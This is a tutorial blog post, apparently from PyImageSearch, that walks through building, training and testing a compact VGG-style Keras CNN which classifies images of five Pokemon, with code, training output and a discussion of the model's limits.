The CNN architecture we will be utilizing today is a smaller, more compact variant of the VGGNet network, introduced by Simonyan and Zisserman in their 2014 paper, Very Deep Convolutional Networks for Large Scale Image Recognition.

VGGNet-like architectures are characterized by:

  1. Using only 3×3 convolutional layers stacked on top of each other in increasing depth
  2. Reducing volume size by max pooling
  3. Fully-connected layers at the end of the network prior to a softmax classifier

I assume you already have Keras installed and configured on your system. If not, here are a few links to deep learning development environment configuration tutorials I have put together:

If you want to skip configuring your deep learning environment, I would recommend using one of the following pre-configured instances in the cloud:

Let’s go ahead and implement SmallerVGGNet, our smaller version of VGGNet. Create a new file named smallervggnet.py inside the pyimagesearch module and insert the following code:
# import the necessary packages
from keras.models import Sequential
from keras.layers.normalization import BatchNormalization
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import MaxPooling2D
from keras.layers.core import Activation
from keras.layers.core import Flatten
from keras.layers.core import Dropout
from keras.layers.core import Dense
from keras import backend as K

First we import our modules — notice that they all come from Keras. Each of these is covered extensively throughout the course of reading Deep Learning for Computer Vision with Python.

Note: You’ll also want to create an __init__.py file inside pyimagesearch so Python knows the directory is a module. If you’re unfamiliar with __init__.py files or how they are used to create modules, no worries, just use the “Downloads” section at the end of this blog post to download my directory structure, source code, and dataset + example images.
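
If you just need to create the file itself, an empty one is sufficient; for example, from the project root:

$ touch pyimagesearch/__init__.py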

From there, we define our SmallerVGGNet class:
class SmallerVGGNet:
        @staticmethod
        def build(width, height, depth, classes):
                # initialize the model along with the input shape to be
                # "channels last" and the channels dimension itself
                model = Sequential()
                inputShape = (height, width, depth)
                chanDim = -1

                # if we are using "channels first", update the input shape
                # and channels dimension
                if K.image_data_format() == "channels_first":
                        inputShape = (depth, height, width)
                        chanDim = 1

Our build method requires four parameters:

  • width: The image width dimension.
  • height: The image height dimension.
  • depth: The depth of the image — also known as the number of channels.
  • classes: The number of classes in our dataset (which will affect the last layer of our model). We’re utilizing 5 Pokemon classes in this post, but don’t forget that you could work with the 807 Pokemon species if you downloaded enough example images for each species!

Note: We’ll be working with input images that are 96 x 96 with a depth of 3 (as we’ll see later in this post). Keep this in mind as we explain the spatial dimensions of the input volume as it passes through the network.

Since we’re using the TensorFlow backend, we arrange the input shape with “channels last” data ordering, but if you want to use “channels first” (Theano, etc.) then it is handled automagically on Lines 23-25.

Now, let’s start adding layers to our model:

# CONV => RELU => POOL
                model.add(Conv2D(32, (3, 3), padding="same",
                        input_shape=inputShape))
                model.add(Activation("relu"))
                model.add(BatchNormalization(axis=chanDim))
                model.add(MaxPooling2D(pool_size=(3, 3)))
                model.add(Dropout(0.25))

Above is our first CONV => RELU => POOL block.

The convolution layer has 32 filters with a 3 x 3 kernel. We’re using the RELU activation function followed by batch normalization.

Our POOL layer uses a 3 x 3 POOL size to reduce spatial dimensions quickly from 96 x 96 to 32 x 32 (we’ll be using 96 x 96 x 3 input images to train our network, as we’ll see in the next section).

As you can see from the code block, we’ll also be utilizing dropout in our network architecture. Dropout works by randomly disconnecting nodes from the current layer to the next layer. This process of random disconnects during training batches helps naturally introduce redundancy into the model — no single node in the layer is responsible for predicting a certain class, object, edge, or corner.

From there we’ll add (CONV => RELU) * 2 layers before applying another POOL layer:
# (CONV => RELU) * 2 => POOL
                model.add(Conv2D(64, (3, 3), padding="same",
                        input_shape=inputShape))
                model.add(Activation("relu"))
                model.add(BatchNormalization(axis=chanDim))
                model.add(Conv2D(64, (3, 3), padding="same",
                        input_shape=inputShape))
                model.add(Activation("relu"))
                model.add(BatchNormalization(axis=chanDim))
                model.add(MaxPooling2D(pool_size=(2, 2)))
                model.add(Dropout(0.25))

Stacking multiple CONV and RELU layers together (prior to reducing the spatial dimensions of the volume) allows us to learn a richer set of features.

Notice how:

  • We’re increasing our filter count from 32 to 64. The deeper we go in the network, the smaller the spatial dimensions of our volume, and the more filters we learn.
  • We decreased the max pooling size from 3 x 3 to 2 x 2 to ensure we do not reduce our spatial dimensions too quickly.

Dropout is again performed at this stage.

Let’s add another set of (CONV => RELU) * 2 => POOL:
# (CONV => RELU) * 2 => POOL
                model.add(Conv2D(128, (3, 3), padding="same",
                        input_shape=inputShape))
                model.add(Activation("relu"))
                model.add(BatchNormalization(axis=chanDim))
                model.add(Conv2D(128, (3, 3), padding="same",
                        input_shape=inputShape))
                model.add(Activation("relu"))
                model.add(BatchNormalization(axis=chanDim))
                model.add(MaxPooling2D(pool_size=(2, 2)))
                model.add(Dropout(0.25))

Notice that we’ve increased our filter count to 128 here. Dropout of 25% of the nodes is again performed to reduce overfitting.

And finally, we have a set of FC => RELU layers and a softmax classifier:
# first (and only) set of FC => RELU layers
                model.add(Flatten())
                model.add(Dense(1024))
                model.add(Activation("relu"))
                model.add(BatchNormalization())
                model.add(Dropout(0.5))

                # softmax classifier
                model.add(Dense(classes))
                model.add(Activation("softmax"))

                # return the constructed network architecture
                return model

The fully connected layer is specified by Dense(1024) with a rectified linear unit activation and batch normalization.

Dropout is performed a final time — this time notice that we’re dropping out 50% of the nodes during training. Typically you’ll use a dropout of 40-50% in fully-connected layers, and a dropout with a much lower rate, normally 10-25%, in earlier layers (if any dropout is applied at all).

We round out the model with a softmax classifier that will return the predicted probabilities for each class label.

A visualization of the network architecture of the first few layers of SmallerVGGNet can be seen in Figure 2 at the top of this section. To see the full resolution of our Keras CNN implementation of SmallerVGGNet, refer to the following link.

Implementing our CNN + Keras training script

Now that SmallerVGGNet is implemented, we can train our Convolutional Neural Network using Keras.

Open up a new file, name it train.py, and insert the following code where we’ll import our required packages and libraries:
# set the matplotlib backend so figures can be saved in the background
import matplotlib
matplotlib.use("Agg")

# import the necessary packages
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import Adam
from keras.preprocessing.image import img_to_array
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import train_test_split
from pyimagesearch.smallervggnet import SmallerVGGNet
import matplotlib.pyplot as plt
from imutils import paths
import numpy as np
import argparse
import random
import pickle
import cv2
import os

We are going to use the "Agg" matplotlib backend so that figures can be saved in the background (Line 3).

The ImageDataGenerator class will be used for data augmentation, a technique used to take existing images in our dataset and apply random transformations (rotations, shearing, etc.) to generate additional training data. Data augmentation helps prevent overfitting.
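
If you’d like to see what these random transformations look like before training, here is a minimal sketch that writes a few augmented variants of a single image to disk for inspection (the image path is hypothetical, and the parameters are illustrative rather than the exact ones we initialize later on Lines 79-81):

# preview ImageDataGenerator augmentation on one image (illustrative sketch)
from keras.preprocessing.image import ImageDataGenerator, img_to_array, load_img
import numpy as np

aug = ImageDataGenerator(rotation_range=25, horizontal_flip=True)

# load a single image and add a batch dimension, since flow() expects batches
image = img_to_array(load_img("dataset/pikachu/00000000.jpg"))  # hypothetical path
image = np.expand_dims(image, axis=0)

# write 5 augmented variants to the current directory as aug_*.jpg
gen = aug.flow(image, batch_size=1, save_to_dir=".", save_prefix="aug",
	save_format="jpg")
for i in range(5):
	next(gen)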

Line 7 imports the Adam optimizer, the optimization method used to train our network.

The LabelBinarizer (Line 9) is an important class to note — this class will enable us to:

  1. Input a set of class labels (i.e., strings representing the human-readable class labels in our dataset).
  2. Transform our class labels into one-hot encoded vectors.
  3. Take an integer class label prediction from our Keras CNN and transform it back into a human-readable label.

I often get asked here on the PyImageSearch blog how we can transform a class label string to an integer and vice versa. Now you know the solution is to use the LabelBinarizer class.
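
Here is a quick sketch of that round trip you can run in a Python shell (the labels are made up for illustration):

# LabelBinarizer round trip: strings -> one-hot vectors -> strings
from sklearn.preprocessing import LabelBinarizer
import numpy as np

lb = LabelBinarizer()
oneHot = lb.fit_transform(["pikachu", "bulbasaur", "charmander", "pikachu"])
print(lb.classes_)   # ['bulbasaur' 'charmander' 'pikachu'] (sorted alphabetically)
print(oneHot[0])     # [0 0 1], the one-hot vector for "pikachu"

# going back: the argmax of a prediction vector indexes into lb.classes_
idx = np.argmax(oneHot[0])
print(lb.classes_[idx])   # pikachu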

The train_test_split function (Line 10) will be used to create our training and testing splits. Also take note of our SmallerVGGNet import on Line 11 — this is the Keras CNN we just implemented in the previous section.

Readers of this blog are familiar with my very own imutils package. If you don’t have it installed/updated, you can install it via:

$ pip install --upgrade imutils

If you are using a Python virtual environment (as we typically do here on the PyImageSearch blog), make sure you use the workon command to access your particular virtual environment before installing/upgrading imutils.

From there, let’s parse our command line arguments:

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--dataset", required=True,
        help="path to input dataset (i.e., directory of images)")
ap.add_argument("-m", "--model", required=True,
        help="path to output model")
ap.add_argument("-l", "--labelbin", required=True,
        help="path to output label binarizer")
ap.add_argument("-p", "--plot", type=str, default="plot.png",
        help="path to output accuracy/loss plot")
args = vars(ap.parse_args())

For our training script, we need to supply three required command line arguments:

  • --dataset: The path to the input dataset. Our dataset is organized in a dataset directory with subdirectories representing each class. Inside each subdirectory are ~250 Pokemon images. See the project directory structure at the top of this post for more details.
  • --model: The path to the output model — this training script will train the model and output it to disk.
  • --labelbin: The path to the output label binarizer — as you’ll see shortly, we’ll extract the class labels from the dataset directory names and build the label binarizer.

We also have one optional argument, --plot. If you don’t specify a path/filename, then a plot.png file will be placed in the current working directory.

You do not need to modify Lines 22-31 to supply new file paths. The command line arguments are handled at runtime. If this doesn’t make sense to you, be sure to review my command line arguments blog post.

Now that we’ve taken care of our command line arguments, let’s initialize some important variables:

# initialize the number of epochs to train for, initial learning rate,
# batch size, and image dimensions
EPOCHS = 100
INIT_LR = 1e-3
BS = 32
IMAGE_DIMS = (96, 96, 3)

# initialize the data and labels
data = []
labels = []

# grab the image paths and randomly shuffle them
print("[INFO] loading images...")
imagePaths = sorted(list(paths.list_images(args["dataset"])))
random.seed(42)
random.shuffle(imagePaths)

Lines 35-38 initialize important variables used when training our Keras CNN:

  • EPOCHS: The total number of epochs we will be training our network for (i.e., how many times our network “sees” each training example and learns patterns from it).
  • INIT_LR: The initial learning rate — a value of 1e-3 is the default value for the Adam optimizer, the optimizer we will be using to train the network.
  • BS: We will be passing batches of images into our network for training. There are multiple batches per epoch. The BS value controls the batch size.
  • IMAGE_DIMS: Here we supply the spatial dimensions of our input images. We’ll require our input images to be 96 x 96 pixels with 3 channels (i.e., RGB). I’ll also note that we specifically designed SmallerVGGNet with 96 x 96 images in mind.

We also initialize two lists — data and labels — which will hold the preprocessed images and labels, respectively.

Lines 46-48 grab all of the image paths and randomly shuffle them.

And from there, we’ll loop over each of those imagePaths:
# loop over the input images
for imagePath in imagePaths:
        # load the image, pre-process it, and store it in the data list
        image = cv2.imread(imagePath)
        image = cv2.resize(image, (IMAGE_DIMS[1], IMAGE_DIMS[0]))
        image = img_to_array(image)
        data.append(image)
 
        # extract the class label from the image path and update the
        # labels list
        label = imagePath.split(os.path.sep)[-2]
        labels.append(label)

We loop over the imagePaths on Line 51 and then proceed to load the image (Line 53) and resize it to accommodate our model (Line 54).

Now it’s time to update our data and labels lists.

We call the Keras img_to_array function to convert the image to a Keras-compatible array (Line 55), followed by appending the image to our list called data (Line 56).

For our labels list, we extract the label from the file path on Line 60 and append it (the label) on Line 61.

So, why does this class label parsing process work?

Consider the fact that we purposely created our dataset directory structure to have the following format:

dataset/{CLASS_LABEL}/{FILENAME}.jpg

Using the path separator on Line 60 we can split the path into an array and then grab the second-to-last entry in the list — the class label.

If this process seems confusing to you, I would encourage you to open up a Python shell and explore an example imagePath by splitting the path on your operating system’s respective path separator.
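
For example, assuming a POSIX-style path (the filename here is made up):

# split a hypothetical imagePath on the OS path separator
import os

imagePath = "dataset/charmander/00000023.jpg"
parts = imagePath.split(os.path.sep)
print(parts)       # ['dataset', 'charmander', '00000023.jpg'] on Linux/macOS
print(parts[-2])   # charmander, i.e. the class label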

Let’s keep moving. A few things are happening in this next code block — additional preprocessing, binarizing labels, and partitioning the data:

# scale the raw pixel intensities to the range [0, 1]
data = np.array(data, dtype="float") / 255.0
labels = np.array(labels)
print("[INFO] data matrix: {:.2f}MB".format(
        data.nbytes / (1024 * 1000.0)))

# binarize the labels
lb = LabelBinarizer()
labels = lb.fit_transform(labels)

# partition the data into training and testing splits using 80% of
# the data for training and the remaining 20% for testing
(trainX, testX, trainY, testY) = train_test_split(data,
        labels, test_size=0.2, random_state=42)

Here we first convert the data array to a NumPy array and then scale the pixel intensities to the range [0, 1] (Line 64). We also convert the labels from a list to a NumPy array on Line 65. An info message is printed which shows the size (in MB) of the data matrix.

Then, we binarize the labels utilizing scikit-learn’s LabelBinarizer (Lines 70 and 71).

With deep learning, or any machine learning for that matter, a common practice is to make a training and testing split. This is handled on Lines 75 and 76 where we create an 80/20 random split of the data.

Next, let’s create our image data augmentation object:

# construct the image generator for data augmentation
aug = ImageDataGenerator(rotation_range=25, width_shift_range=0.1,
        height_shift_range=0.1, shear_range=0.2, zoom_range=0.2,
        horizontal_flip=True, fill_mode="nearest")

Since we’re working with a limited number of data points (< 250 images per class), we can make use of data augmentation during the training process to give our model more images (based on existing images) to train with.

Data Augmentation is a tool that should be in every deep learning practitioner’s toolbox. I cover data augmentation in the Practitioner Bundle of Deep Learning for Computer Vision with Python.

We initialize aug, our ImageDataGenerator, on Lines 79-81.

From there, let’s compile the model and kick off the training:

# initialize the model
print("[INFO] compiling model...")
model = SmallerVGGNet.build(width=IMAGE_DIMS[1], height=IMAGE_DIMS[0],
        depth=IMAGE_DIMS[2], classes=len(lb.classes_))
opt = Adam(lr=INIT_LR, decay=INIT_LR / EPOCHS)
model.compile(loss="categorical_crossentropy", optimizer=opt,
        metrics=["accuracy"])

# train the network
print("[INFO] training network...")
H = model.fit_generator(
        aug.flow(trainX, trainY, batch_size=BS),
        validation_data=(testX, testY),
        steps_per_epoch=len(trainX) // BS,
        epochs=EPOCHS, verbose=1)

On Lines 85 and 86, we initialize our Keras CNN model with 96 x 96 x 3 input spatial dimensions. I’ll state this again as I receive this question often — SmallerVGGNet was designed to accept 96 x 96 x 3 input images. If you want to use different spatial dimensions you may need to either:
  1. Reduce the depth of the network for smaller images
  2. Increase the depth of the network for larger images

Do not go blindly editing the code. Consider the implications larger or smaller images will have first!

We’re going to use the Adam optimizer with learning rate decay (Line 87) and then compile our model with categorical cross-entropy since we have > 2 classes (Lines 88 and 89).

Note: For only two classes you should use binary cross-entropy as the loss.
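
For reference, a hypothetical two-class version of the compile step would look like the sketch below (keep in mind the final layer of the network would also need a single sigmoid-activated output rather than a softmax):

# hypothetical 2-class variant -- not used in this post
model.compile(loss="binary_crossentropy", optimizer=opt,
        metrics=["accuracy"])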

From there, we make a call to the Keras fit_generator method to train the network (Lines 93-97). Be patient — this can take some time depending on whether you are training using a CPU or a GPU.
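
The steps_per_epoch value also explains the “29/29” progress bars you’ll see in the training log below. Assuming a batch size BS of 32 (as set in the script’s hyperparameters) and roughly 930 images landing in the 80% training split, integer division gives 29 steps per epoch:

# a sketch of the arithmetic (assumes BS = 32 and ~933 training images)
print(933 // 32)  # => 29 batches per epoch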

Once our Keras CNN has finished training, we’ll want to save both the (1) model and (2) label binarizer as we’ll need to load them from disk when we test the network on images outside of our training/testing set:

# save the model to disk
print("[INFO] serializing network...")
model.save(args["model"])

# save the label binarizer to disk
print("[INFO] serializing label binarizer...")
f = open(args["labelbin"], "wb")
f.write(pickle.dumps(lb))
f.close()

We serialize the model (Line 101) and the label binarizer (Lines 105-107) so we can easily use them later in our classify.py script.

The label binarizer file contains our serialized LabelBinarizer, whose classes_ attribute maps each integer class index back to a human-readable class label. This object ensures we don’t have to hardcode our class labels in scripts that wish to use our Keras CNN.
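
As a quick sanity check, you can inspect the saved binarizer from a Python shell (assuming the lb.pickle filename we’ll pass via --labelbin later):

import pickle

lb = pickle.loads(open("lb.pickle", "rb").read())
print(lb.classes_)  # e.g. ['bulbasaur' 'charmander' 'mewtwo' 'pikachu' 'squirtle']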

Finally, we can plot our training loss and accuracy:

# plot the training loss and accuracy
plt.style.use("ggplot")
plt.figure()
N = EPOCHS
plt.plot(np.arange(0, N), H.history["loss"], label="train_loss")
plt.plot(np.arange(0, N), H.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, N), H.history["acc"], label="train_acc")
plt.plot(np.arange(0, N), H.history["val_acc"], label="val_acc")
plt.title("Training Loss and Accuracy")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="upper left")
plt.savefig(args["plot"])

I elected to save my plot to disk (Line 121) rather than displaying it for two reasons: (1) I’m on a headless server in the cloud and (2) I wanted to make sure I don’t forget to save the plot.
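
If you’re following along on a headless machine, keep in mind that matplotlib needs a non-interactive backend set before pyplot is imported, otherwise plotting may fail without a display attached. Something along these lines near the top of the script does the trick:

# set matplotlib's non-interactive backend so plots can be saved
# without a display attached (must come before importing pyplot)
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt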

Training our CNN with Keras

Now we’re ready to train our Pokedex CNN.

Be sure to visit the “Downloads” section of this blog post to download code + data.

Then execute the following command to train the model, making sure to provide the command line arguments properly:

$ python train.py --dataset dataset --model pokedex.model --labelbin lb.pickle
Using TensorFlow backend.
[INFO] loading images...
[INFO] data matrix: 252.07MB
[INFO] compiling model...
[INFO] training network...
name: GeForce GTX TITAN X
major: 5 minor: 2 memoryClockRate (GHz) 1.076
pciBusID 0000:09:00.0
Total memory: 11.92GiB
Free memory: 11.71GiB
Epoch 1/100
29/29 [==============================] - 2s - loss: 1.4015 - acc: 0.6088 - val_loss: 1.8745 - val_acc: 0.2134
Epoch 2/100
29/29 [==============================] - 1s - loss: 0.8578 - acc: 0.7285 - val_loss: 1.4539 - val_acc: 0.2971
Epoch 3/100
29/29 [==============================] - 1s - loss: 0.7370 - acc: 0.7809 - val_loss: 2.5955 - val_acc: 0.2008
...
Epoch 98/100
29/29 [==============================] - 1s - loss: 0.0833 - acc: 0.9702 - val_loss: 0.2064 - val_acc: 0.9540
Epoch 99/100
29/29 [==============================] - 1s - loss: 0.0678 - acc: 0.9727 - val_loss: 0.2299 - val_acc: 0.9456
Epoch 100/100
29/29 [==============================] - 1s - loss: 0.0890 - acc: 0.9684 - val_loss: 0.1955 - val_acc: 0.9707
[INFO] serializing network...
[INFO] serializing label binarizer...

Looking at the output of our training script we see that our Keras CNN obtained:

  • 96.84% classification accuracy on the training set
  • And 97.07% accuracy on the testing set

The training loss/accuracy plot follows:

Figure 3: Training and validation loss/accuracy plot for a Pokedex deep learning classifier trained with Keras.

As you can see in Figure 3, I trained the model for 100 epochs and achieved low loss with limited overfitting. With additional training data we could obtain higher accuracy as well.

Creating our CNN and Keras testing script

Now that our CNN is trained, we need to implement a script to classify images that are not part of our training or validation/testing set. Open up a new file, name it classify.py, and insert the following code:
# import the necessary packages
from keras.preprocessing.image import img_to_array
from keras.models import load_model
import numpy as np
import argparse
import imutils
import pickle
import cv2
import os

First we import the necessary packages (Lines 2-9).

From there, let’s parse command line arguments:

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-m", "--model", required=True,
        help="path to trained model model")
ap.add_argument("-l", "--labelbin", required=True,
        help="path to label binarizer")
ap.add_argument("-i", "--image", required=True,
        help="path to input image")
args = vars(ap.parse_args())

We have three required command line arguments we need to parse:

  • --model : The path to the model that we just trained.
  • --labelbin : The path to the label binarizer file.
  • --image : Our input image file path.

Each of these arguments is established and parsed on Lines 12-19. Remember, you don’t need to modify these lines — I’ll show you how to run the program in the next section using the command line arguments provided at runtime.

Next, we’ll load and preprocess the image:

# load the image
image = cv2.imread(args["image"])
output = image.copy()
 
# pre-process the image for classification
image = cv2.resize(image, (96, 96))
image = image.astype("float") / 255.0
image = img_to_array(image)
image = np.expand_dims(image, axis=0)

Here we load the input image (Line 22) and make a copy called output for display purposes (Line 23).

Then we preprocess the image in the exact same manner that we did for training (Lines 26-29).
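
For the curious, here’s the shape bookkeeping for that preprocessing block (a sketch, assuming a typical 3-channel input photo):

# cv2.imread     -> (H, W, 3) BGR pixel array
# cv2.resize     -> (96, 96, 3)
# img_to_array   -> (96, 96, 3) as a float32 array
# np.expand_dims -> adds the batch dimension the CNN expects
print(image.shape)  # => (1, 96, 96, 3)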

From there, let’s load the model + label binarizer and then classify the image:

# load the trained convolutional neural network and the label
# binarizer
print("[INFO] loading network...")
model = load_model(args["model"])
lb = pickle.loads(open(args["labelbin"], "rb").read())

# classify the input image
print("[INFO] classifying image...")
proba = model.predict(image)[0]
idx = np.argmax(proba)
label = lb.classes_[idx]

In order to classify the image, we need the model and label binarizer in memory. We load both on Lines 34 and 35.

Subsequently, we classify the image and create the label (Lines 39-41).
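
If you’d like to see more than just the winning class, a small optional addition (not in the original script) will rank every class probability, highest first:

# optional: print all class probabilities in descending order
for i in np.argsort(proba)[::-1]:
        print("{}: {:.2f}%".format(lb.classes_[i], proba[i] * 100))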

The remaining code block is for display purposes:

# we'll mark our prediction as "correct" if the input image filename
# contains the predicted label text (obviously this makes the
# assumption that you have named your testing image files this way)
filename = args["image"][args["image"].rfind(os.path.sep) + 1:]
correct = "correct" if filename.rfind(label) != -1 else "incorrect"

# build the label and draw the label on the image
label = "{}: {:.2f}% ({})".format(label, proba[idx] * 100, correct)
output = imutils.resize(output, width=400)
cv2.putText(output, label, (10, 25),  cv2.FONT_HERSHEY_SIMPLEX,
        0.7, (0, 255, 0), 2)

# show the output image
print("[INFO] {}".format(label))
cv2.imshow("Output", output)
cv2.waitKey(0)

On Lines 46 and 47, we’re extracting the name of the Pokemon from the filename and comparing it to the label. The correct variable will be either "correct" or "incorrect" based on this. Obviously these two lines make the assumption that your input image has a filename that contains the true label.

From there we take the following steps:

  1. Append the probability percentage and "correct" / "incorrect" text to the class label (Line 50).
  2. Resize the output image so it fits our screen (Line 51).
  3. Draw the label text on the output image (Lines 52 and 53).
  4. Display the output image and wait for a keypress to exit (Lines 57 and 58).

Classifying images with our CNN and Keras

We’re now ready to run the classify.py script!

Ensure that you’ve grabbed the code + images from the “Downloads” section at the bottom of this post.

Once you’ve downloaded and unzipped the archive, change into the root directory of this project and follow along, starting with an image of Charmander. Notice that we’ve provided three command line arguments in order to run the script:

$ python classify.py --model pokedex.model --labelbin lb.pickle \
        --image examples/charmander_counter.png
Using TensorFlow backend.
[INFO] loading network...
[INFO] classifying image...
[INFO] charmander: 99.77% (correct)

Figure 4: Correctly classifying an input image using Keras and Convolutional Neural Networks.

And now let’s query our model with the loyal and fierce Bulbasaur stuffed Pokemon:

$ python classify.py --model pokedex.model --labelbin lb.pickle \
        --image examples/bulbasaur_plush.png
Using TensorFlow backend.
[INFO] loading network...
[INFO] classifying image...
[INFO] bulbasaur: 99.35% (correct)

Figure 5: Again, our Keras deep learning image classifier is able to correctly classify the input image [image source]

Let’s try a toy action figure of Mewtwo (a genetically engineered Pokemon):
$ python classify.py --model pokedex.model --labelbin lb.pickle \
        --image examples/mewtwo_toy.png
Using TensorFlow backend.
[INFO] loading network...
[INFO] classifying image...
[INFO] mewtwo: 100.00% (correct)

Figure 6: Using Keras, deep learning, and Python we are able to correctly classify the input image using our CNN. [image source]

What would an example Pokedex be if it couldn’t recognize the infamous Pikachu:
$ python classify.py --model pokedex.model --labelbin lb.pickle \
        --image examples/pikachu_toy.png
Using TensorFlow backend.
[INFO] loading network...
[INFO] classifying image...
[INFO] pikachu: 99.58% (correct)

Figure 7: Using our Keras model we can recognize the iconic Pikachu Pokemon. [image source]

Let’s try the cute Squirtle Pokemon:
$ python classify.py --model pokedex.model --labelbin lb.pickle \
        --image examples/squirtle_plush.png
Using TensorFlow backend.
[INFO] loading network...
[INFO] classifying image...
[INFO] squirtle: 98.62% (correct)

Figure 8: Correctly classifying image data using Keras and a CNN. [image source]

And last but not least, let’s classify my fire-tailed Charmander again. This time he is being shy and is partially occluded by my monitor.
$ python classify.py --model pokedex.model --labelbin lb.pickle \
        --image examples/charmander_hidden.png
Using TensorFlow backend.
[INFO] loading network...
[INFO] classifying image...
[INFO] charmander: 59.82% (correct)

Figure 9: One final example of correctly classifying an input image using Keras and Convolutional Neural Networks (CNNs).

Each of these Pokemon was no match for my new Pokedex.

Currently, there are around 807 different species of Pokemon. Our classifier was trained on only five different Pokemon (for the sake of simplicity).

If you’re looking to train a classifier to recognize more Pokemon for a bigger Pokedex, you’ll need additional training images for each class. Ideally, your goal should be to have 500-1,000 images per class you wish to recognize.

To acquire training images, I suggest that you look no further than Microsoft Bing’s Image Search API. This API is hands down easier to use than the Google Image Search hack I shared previously (though that approach would work too).

Limitations of this model

One of the primary limitations of this model is the small amount of training data. I tested on various images and at times the classifications were incorrect. When this happened, I examined the input image + network more closely and found that the color(s) most dominant in the image influence the classification dramatically.

For example, lots of red and oranges in an image will likely return “Charmander” as the label. Similarly, lots of yellows in an image will normally result in a “Pikachu” label.

This is partially due to our input data. Pokemon are obviously fictitious, so there are no actual “real-world” images of them (other than the action figures and toy plushes).

Most of our images came from either fan illustrations or stills from the movie/TV show. And furthermore, we only had a limited amount of data for each class (~225-250 images).

Ideally, we should have at least 500-1,000 images per class when training a Convolutional Neural Network. Keep this in mind when working with your own data.

Can we use this Keras deep learning model as a REST API?

If you would like to run this model (or any other deep learning model) as a REST API, I wrote three blog posts to help you get started:

  1. Building a simple Keras + deep learning REST API (Keras.io guest post)
  2. A scalable Keras + deep learning REST API
  3. Deep learning in production with Keras, Redis, Flask, and Apache

Summary

In today’s blog post you learned how to train a Convolutional Neural Network (CNN) using the Keras deep learning library.

Our dataset was gathered using the procedure discussed in last week’s blog post.

In particular, our dataset consists of 1,191 images of five separate Pokemon (animal-like creatures that exist in the world of Pokemon, the popular TV show, video game, and trading card series).

Using our Convolutional Neural Network and Keras, we were able to obtain 97.07% accuracy, which is quite respectable given (1) the limited size of our dataset and (2) the number of parameters in our network.

In next week’s blog post I’ll be demonstrating how we can:

  1. Take our trained Keras + Convolutional Neural Network model…
  2. …and deploy it to a smartphone with only a few lines of code!

It’s going to be a great post, don’t miss it!

To download the source code to this post (and be notified when next week’s can’t-miss post goes live), just enter your email address in the form below!

Downloads:

If you would like to download the code and images used in this post, please enter your email address in the form below. Not only will you get a .zip of the code, I’ll also send you a FREE 11-page Resource Guide on Computer Vision and Image Search Engines, including exclusive techniques that I don’t post on this blog! Sound good? If so, enter your email address and I’ll send you the code immediately!

The post Keras and Convolutional Neural Networks (CNNs) appeared first on PyImageSearch.



from PyImageSearch https://ift.tt/2JMPzfv
via IFTTT